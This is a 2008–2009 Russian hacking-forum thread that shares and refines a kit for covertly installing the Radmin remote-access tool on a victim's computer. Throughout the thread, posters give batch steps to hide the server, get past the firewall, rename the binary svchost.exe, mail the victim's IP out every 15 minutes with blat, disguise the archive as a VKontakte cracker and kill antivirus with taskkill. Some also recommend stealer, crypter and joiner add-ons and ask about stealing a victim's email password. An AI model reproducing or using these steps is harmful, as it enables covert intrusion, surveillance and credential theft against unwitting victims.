Форум АНТИЧАТ

Форум АНТИЧАТ (https://forum.antichat.xyz/index.php)
-   АнтиАдмин (https://forum.antichat.xyz/forumdisplay.php?f=20)
-   -   Скрытый радмин + скрытая установка + ip на почту (https://forum.antichat.xyz/showthread.php?t=97202)

qazer 20.12.2008 18:18

Скрытый радмин + скрытая установка + ip на почту
 
Сборка от меня для тех кому лень перечитывать сотни страниц фака по этой теме.

Все файлы надо добавить в SFX архив и в свойствах указать выполнить после распаковки install.bat

далее при запуски архива...вы не увидите ничего)Это работа утилиты CMDow которая запускает cmd в скрытом режиме.

что же происходит в данный момент?

архив распаковывает файлы файлы для радмина копирует в windows, файлы почтовой утилиты в windows\system32\ , добавляет записи в реестре чтобы радминсервер не было видно,чтоб не ругался виндфаерволл, запускает радминсервер , и отдаёт команду на отсылку ip на ваш почтовый адрес.

после того,как программа выполнится,все распакованные файлы удаляются.

Как пользоваться?

В файле install.bat надо прописать адрес логин и пароль вашей почты,а так же строку с паролем от радмина (по умолчанию пароля нет).далее создаём самораспаковывающийся архив, и кидаем его жертве.

Чтобы не было так паливно,можно прописать в install.bat удаление самого архива и запуск какой-нибудь проги,установщик которой вы добавите в архив,например "Взлом_Вконтакте.exe"

Дописывайте,корректируйте под свои нужды,я лишь выкладываю основу,далее всё зависит от вашей фантазии

P.S. готовый sfx архив не возможно передать по почте,говорит найден вирус)как это обойти,каждый додумывается сам.


http://www.filehoster.ru/files/bx3443

никаких вирусов там нет,архив обычный

k0lbasa 05.01.2009 01:32

отличная штука

cremator (c) 05.01.2009 01:47

Кто тестил?

ex3me 07.01.2009 17:49

использование батников палится антивирусниками... имхо - этот способ устарел с тех пор, как ушла из жизни винда 95/98, поэтому см пост http://forum.antichat.ru/showpost.php?p=1041809&postcount=227

SmaTR 07.01.2009 19:01

незнаю,всё проверил,каспер непалит,только вот ип на почту неприходит)) а тк у нас тут у всех ип динамический,приходится каждый раз просить прислать картинку в аське))))) есть какойнить способ узнать ип удаленно?

stopxaker 07.01.2009 19:13

Цитата:

Сообщение от SmaTR
незнаю,всё проверил,каспер непалит,только вот ип на почту неприходит)) а тк у нас тут у всех ип динамический,приходится каждый раз просить прислать картинку в аське))))) есть какойнить способ узнать ип удаленно?

есть способ , я делаю так : радмин (моя сборка) +pinch, этот радмин перебивает уже установленный радмин на мой пароль и не виден в трее , что очень удобно .

2 qazer способ устарел , протестил на 6 компах везде палево , опять же говорю радмин (моя сборка) +pinch+криптор+джойнер и будет всё very good ;)

2 qazer а то что писал +

ex3me 08.01.2009 18:36

У меня сейчас заказ: создать сборку, в которой отправка IP жертвы будет производиться на номер ICQ. Выложу позже на Плати.ру - кто захочет, тот приобритет.
Спросите почему платно? Отвечу: после изменений в протоколе icq (ведь все обновляли квип до 8080? кто обновлял - поймет меня) довольно трудно написать что-то работающее, чтобы оно отправляло что-то куда-то (я использую делфи 7й версии)

B1t.exe 08.01.2009 19:18

так не понял, как отправляет на почту IP ? SMTP (25 Порт?)? а если стоит файрвол и у клиента нет аутлук ? (например у меня не стоит никакого почтового клиента).

qazer 08.01.2009 19:42

там в сборке консольный почтовый клиент есть,который всё и отправляет юкстати там в настройках указан альтернативный порт (можно переделать на 25ый)

stopxaker 08.01.2009 20:28

Цитата:

Сообщение от ex3me
У меня сейчас заказ: создать сборку, в которой отправка IP жертвы будет производиться на номер ICQ. Выложу позже на Плати.ру - кто захочет, тот приобритет.
Спросите почему платно? Отвечу: после изменений в протоколе icq (ведь все обновляли квип до 8080? кто обновлял - поймет меня) довольно трудно написать что-то работающее, чтобы оно отправляло что-то куда-то (я использую делфи 7й версии)


Я приобрету без разговора , давно уже юзаю твои сборки , доволен :)

оффтоп 2 ex3me стукнул в аську ;)

DREASTY 08.01.2009 20:46

молодчага!!давно таким занималсь!все еще актуально!

stratocaster 18.01.2009 01:02

Кто нить тестил? А то я нуб и оажется что это вдруг еще не работает, а если это работает - буду рабираться, отзовитесь кто тестил

Tigger 18.01.2009 02:49

Вы, конечно, прости, но я не нашел, где в настройках Архива определлый файл выполнить =\

qazer 18.01.2009 21:32

делаешь sfx архив там на вкладке дополнительно есть строчка после распаковки выполнить и пишешь туда имя файла

Shadow6120 21.01.2009 23:28

А ни у кого нет подобной сборки только где радмин 3.*? А то висту срочно ломануть надо :)

cracker 24.01.2009 01:02

Цитата:

В файле install.bat надо прописать адрес логин и пароль вашей почты,а так же строку с паролем от радмина (по умолчанию пароля нет).далее создаём самораспаковывающийся архив, и кидаем его жертве.
в какой именно строки надо прописать пароли от радмина?и как?

Kharek 01.02.2009 17:08

Я добавил пароль к радмину такой командой:
Код:

"%SYSTEMROOT%/svchost.exe" /save /silence /pass:тут_пишешь_пароль /port:тут_пишешь_порт
Пишешь эту команду сразу после строчки
Код:

"%SYSTEMROOT%/help/Tours/mmTour/svchost.exe" /install /silence
Но почта не работает. Может быть это связано с тем, что я юзаю gmail.com, а у них защищенное TSL соеденение?

pirbul 06.02.2009 19:25

жалко что она одноразовая.....

Scripter 06.02.2009 22:08

Цитата:

Сообщение от cracker
в какой именно строки надо прописать пароли от радмина?и как?

либо в реестре

Hackser68 06.02.2009 22:20

люди чёто я не вьехал обьясните дурачку как настроить?

stopxaker 07.02.2009 06:13

Цитата:

Сообщение от Hackser68
люди чёто я не вьехал обьясните дурачку как настроить?


Для дурачков , вот человек написал готовый скрытый радмин всё в одном флаконе !

http://forum.antichat.ru/threadnav101461-1-10.html

Slev7n 05.03.2009 16:35

если тема ешо актуална для тех которие не разобрались с отсиланиам почты

в етои строке убираити вконтсе точку
Код:

blat.exe %systemroot%/system32/ip.txt -to вашапочта@yandex.ru.
+ делаити фаил ip.bat с вашаи сторчкой ( с вашаи почтаи на которую будит отсилат ) прописиваити ево в install.bat
Код:

copy /y "ip.bat" "%SYSTEMROOT%/system32/ip.bat"
тогда вам на почту каждие 15 минут будит приходит ip

Svist2008 06.04.2009 19:08

Чтобы не было так паливно,можно прописать в install.bat удаление самого архива и запуск какой-нибудь проги,установщик которой вы добавите в архив,например "Взлом_Вконтакте.exe"

Подскажите плиз, что прописать в батнике, чтобы удалился сам SFX архив.
Спасибо.

MRAK9 06.04.2009 19:30

Цитата:

Сообщение от Svist2008
Чтобы не было так паливно,можно прописать в install.bat удаление самого архива и запуск какой-нибудь проги,установщик которой вы добавите в архив,например "Взлом_Вконтакте.exe"

Подскажите плиз, что прописать в батнике, чтобы удалился сам SFX архив.
Спасибо.

а в самом SFX прописать никак что ли

Svist2008 06.04.2009 19:36

Цитата:

Сообщение от MRAK9
а в самом SFX прописать никак что ли

____________________________________________
А разве там есть такая функция?

Svist2008 07.04.2009 11:15

Народ, так кто нибудь подскажет, что прописать в батнике, что бы после распаковки SFX архива этот же архив удалился?

Zitt 07.04.2009 11:42

Цитата:

А разве там есть такая функция?
есть ..

Svist2008 07.04.2009 11:50

Цитата:

Сообщение от Zitt
есть ..


Ты оказывается ещё хуже меня с компом знаком!
Там такой функции нет и быт не может!!!!!!!!!!!!!

Zitt 07.04.2009 11:55

напиши команду после распоковки или в батнике "del sfx.exe" (без кавычек)

Svist2008 07.04.2009 13:18

Цитата:

Сообщение от Zitt
напиши команду после распоковки или в батнике "del sfx.exe" (без кавычек)

Нет, не получается, не удаляетя такой командой при распаковки архив SFX :mad:

Reptiliy 15.04.2009 00:34

Ребят не подскажите как мне узнать пароль от его мыла ? Короче закинул я жертве скрытый Radmin приконектился хотел закинуть трояна через радмин но начал закидывать там антивирус закричал как мне через телнет его выключить ? у него стоит антивирус Sumantec AntiVirus

blood150 15.04.2009 07:08

Цитата:

Сообщение от Reptiliy
Ребят не подскажите как мне узнать пароль от его мыла ? Короче закинул я жертве скрытый Radmin приконектился хотел закинуть трояна через радмин но начал закидывать там антивирус закричал как мне через телнет его выключить ? у него стоит антивирус Sumantec AntiVirus

узнай под каким именем Sumantec AntiVirus в диспетчере задач в процессах отоброжается и сделай так:
taskkill /f /im название_процесса.exe
я закрывал нод 32 так: taskkill /f /im egui.exe

Reptiliy 15.04.2009 10:09

blood150 а как узнать в диспечере задач как он отображаеца

speckn 21.05.2009 14:15

drweb 5.0 видит в этом архиве RA и еще что-то не помню

zeonx 22.05.2009 19:14

Цитата:

Сообщение от Reptiliy
Ребят не подскажите как мне узнать пароль от его мыла ? Короче закинул я жертве скрытый Radmin приконектился хотел закинуть трояна через радмин но начал закидывать там антивирус закричал как мне через телнет его выключить ? у него стоит антивирус Sumantec AntiVirus

Нелегче ли тебе скачать файлы с паролями и у себя их расшифровать. Антивирусы просто так не вырубишь.

wisspy 07.08.2009 17:15

Подскажите пожалуйста ньюбу, чем запаковать это всё великолепие в .exe файл...
Много гуглил... как то туго для меня это даётся...
Пробовал nBinder Limited но он что-то не хочет работать у меня : \

vilfenix 10.08.2009 20:42

дайте батник плиз, который отсылает ip жертвы на мыло, желательно с таймерои, чтобы каждые пять минут присылал
очень нужно

zeonx 13.08.2009 11:03

Цитата:

Сообщение от wisspy
Подскажите пожалуйста ньюбу, чем запаковать это всё великолепие в .exe файл...
Много гуглил... как то туго для меня это даётся...
Пробовал nBinder Limited но он что-то не хочет работать у меня : \

Quick Batch Compiler тебе поможет

Drag_on 09.09.2009 15:24

Гуд сам так баловался)

hackmon 07.10.2009 17:20

где прописывать пасс? на радмин


Время: 10:57